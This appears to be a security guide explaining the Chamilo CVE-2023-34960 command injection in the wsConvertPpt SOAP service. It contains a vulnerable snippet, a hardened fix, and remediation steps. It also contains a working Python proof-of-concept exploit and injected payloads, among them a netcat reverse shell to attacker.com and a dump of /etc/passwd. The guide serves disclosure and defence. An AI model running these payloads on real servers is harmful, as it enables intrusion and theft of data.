Chamilo is a popular open-source e-learning platform, used worldwide by schools, universities, and companies. But in June 2023, security researchers uncovered a dangerous command injection vulnerability (CVE-2023-34960) in one of its core features: the wsConvertPpt component. This weakness can let attackers run commands on the server – with just a specially crafted PowerPoint file name, via a SOAP webservice call.

In this guide, I’ll break down how this vulnerability works, show part of the exploit process, and explain how you can protect your platform.

1. What is wsConvertPpt in Chamilo?

wsConvertPpt is a component in Chamilo that converts PowerPoint (.ppt) files into images for use in online courses. This is done through a SOAP (Simple Object Access Protocol) API call—typically something only admins or the system itself would use. However, due to bad input handling, attackers can abuse this interface.

2. The Vulnerability: Command Injection

Here’s the short version: Chamilo didn’t sanitize the file name sent to wsConvertPpt. If an attacker sends a *maliciously crafted* PowerPoint file name (containing shell commands), the server will run those commands—often with high privileges.

Original Discovery References

- Chamilo Security Advisory
- Packet Storm Security Advisory

In the official fix, the maintainers patched the command injection by filtering and validating user input.

3. Where in the Code? (Vulnerable Snippet)

The vulnerability lies in how Chamilo builds a shell command from the submitted file name without stripping or quoting shell metacharacters. Here’s a simplified code snippet (based on reported patches and public disclosures):

// WARNING: This is insecure and vulnerable!
$ppt_file = $_POST['ppt_file'];
$cmd = "unoconv -f pdf $ppt_file";
$output = shell_exec($cmd);

Normally, $ppt_file should be just a file name like lesson1.ppt. But if an attacker sends something like evil.ppt; id > /tmp/hacked.txt; #, the shell would execute *both* the conversion and the attacker’s injected command!
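As an added example that is not Chamilo's own code or patch, here is a hardened form of the same call: the file name is validated against a strict allowlist before it goes anywhere near the shell, and the argument is quoted with escapeshellarg as a second layer. The function names, the upload directory and the sample inputs are assumptions made for illustration.

```php
<?php
// Added example, not Chamilo's code. Function and variable names are hypothetical.

// Accept only a bare file name made of safe characters with a .ppt/.pptx
// extension. Path components, spaces and shell metacharacters (; | & > ` $)
// are all rejected before the value can reach the shell.
function validatePptName(string $name): ?string
{
    // A path (anything containing a directory separator) is never acceptable.
    if ($name !== basename($name)) {
        return null;
    }
    // Allowlist: letters, digits, underscore, dot, dash; bounded length.
    if (!preg_match('/^[A-Za-z0-9_.-]{1,100}\.pptx?$/', $name)) {
        return null;
    }
    // Reject dot-prefixed names so that "..ppt"-style names fail too.
    if ($name[0] === '.') {
        return null;
    }
    return $name;
}

function buildConvertCommand(string $uploadDir, string $name): ?string
{
    $safeName = validatePptName($name);
    if ($safeName === null) {
        // Log the rejection so an injection attempt is visible to defenders.
        error_log('wsConvertPpt: rejected file name: ' . json_encode($name));
        return null;
    }
    // Even after validation, quote the argument so the shell never parses it.
    $path = $uploadDir . DIRECTORY_SEPARATOR . $safeName;
    return 'unoconv -f pdf ' . escapeshellarg($path);
}

// Constructed inputs: the legitimate name from the article, the injection
// string quoted above, and a path-traversal attempt.
$samples = [
    'lesson1.ppt',
    'evil.ppt; id > /tmp/hacked.txt; #',
    '../../etc/passwd.ppt',
];
foreach ($samples as $s) {
    $cmd = buildConvertCommand('/var/www/uploads', $s);
    printf("%-40s => %s\n", $s, $cmd ?? 'REJECTED');
}
```

Only the first sample yields a command; the other two are logged and rejected, and the quoting means that even a name that slipped past the allowlist would be passed to unoconv as a single literal argument.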

4. How Does Exploitation Work?

Here’s how an attacker might exploit CVE-2023-34960, step by step, using the SOAP API.

Prerequisites

- Access to Chamilo’s SOAP interface (often /main/webservices/soap/)
- No input filtering / patch not applied

1. Send a SOAP request to the wsConvertPpt service with a specially crafted filename parameter.
   - Example: dummy.ppt; id > /var/www/html/shell.txt; #
2. The Chamilo server receives the request and runs the shell command with the injected payload.
3. The attacker’s command executes: in this case, it runs id (which prints the running user) and saves the output to a web-accessible file.
4. The attacker checks the file via their browser to read the server’s identity, proving command execution.

Example SOAP Exploit (Python)

Below is a simplified demo of what an exploit might look like. *Do not run this outside a safe test environment!*

import requests

soap_url = "http://chamilo.example.com/main/webservices/soap/server.php"
headers = {
    'Content-Type': 'text/xml; charset=utf-8',
    'SOAPAction': '"urn:#wsConvertPpt"'
}
malicious_name = "evil.ppt; id > /var/www/html/cve.txt; #"
soap_body = f"""<?xml version="1.0" encoding="UTF-8"?>
<soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
  <soap:Body>
    <wsConvertPpt xmlns="urn:ChamiloAPI">
      <name>{malicious_name}</name>
    </wsConvertPpt>
  </soap:Body>
</soap:Envelope>
"""

# Send the malicious request
response = requests.post(soap_url, data=soap_body, headers=headers)
print(f"SOAP status: {response.status_code}")

# The file 'cve.txt' may now contain server command results!
check = requests.get("http://chamilo.example.com/cve.txt")
print("Command output:\n" + check.text)

Any shell command is possible in the injected filename. Examples:

- Dump the password file: evil.ppt; cat /etc/passwd > /var/www/html/pwd.txt ; #
- Create a reverse shell: evil.ppt; nc attacker.com 4444 -e /bin/sh ; #
- Install malware on the server.
- Extract sensitive user/course files.

7. Fixing the Vulnerability

Update Chamilo as soon as possible, preferably to v1.11.19 or later. You can find official fixes and recommendations here:

- Official Chamilo Security Issues Page
- Upgrade instructions: Chamilo Upgrade Docs

- Disable the SOAP API if it is not needed.
- Restrict access to /main/webservices/soap/server.php using a firewall rule or .htaccess.

8. Summary

CVE-2023-34960 is a textbook example of why input validation is critical—especially when file names or user input reaches the OS shell. In Chamilo, attackers could exploit this flaw for complete server compromise via a simple SOAP API call. Patching and preventative controls are essential.

Further Reading

- NIST CVE Entry
- Official Chamilo Github
- How to Prevent Command Injection

If you have questions on remediation or think you might be vulnerable, feel free to reach out to the Chamilo community or a trusted security advisor. Stay safe!

Timeline

Published on: 08/01/2023 02:15:00 UTC
Last modified on: 08/24/2023 17:15:00 UTC